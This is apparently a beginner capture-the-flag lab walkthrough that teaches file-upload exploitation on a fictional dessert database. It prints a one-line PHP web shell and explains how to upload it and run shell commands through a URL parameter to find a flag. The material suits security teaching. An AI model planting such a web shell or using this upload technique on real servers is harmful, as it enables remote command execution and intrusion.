Dessert Database File Upload Exploitation
This page will help you learn how Alice and Bob’s dessert database works and help you hack into it just like those L33k3ers!
Lets Begin
First, lets begin by going to the database itself…
Here you will see the option to upload a picture of your favorite dessert!
Go ahead, find a picture of your favorite dessert, download the image to your computer, then upload!
Cool right?
Now here is the part that Alice and Bob want you to pay close attention to…
Exploit
We want you to download this file below…
The contents of this file are the following
<? print_r(system($_GET['cmd'])); ?>
What this line of code does is it allows for us to inject (enter) bash commands into the url. The Bash commands that you can type are the same commands that you learned yesterday in the bash tutorial!
These bash commands can do all types of malicious things such as go list all the files the website contains, delete files, ect. So, they L33k3rs must have used bash commands to put the picutres of the leeks all over our database!
But we won’t be deleting files cause we are not the L33k3ers!
Now that you know what the file we just downloaded does, upload that file just as you did with your dessert image
Once you do that, you will be directed to a page that says
We got your cake image: /cakes/Hack.php
With a little image underneath
Right click on this image and select, “Open Image in new Tab”
Once at the new webpage, go to the url and at the very end put this statement…
?cmd=ls
Hit enter, and now you see a list of all the files that the website contains! Crazy right!
The command that is executed is directly after the =, so like we learned in the bash tutorial, ls prints all the contents of a directory. Now, find the flag!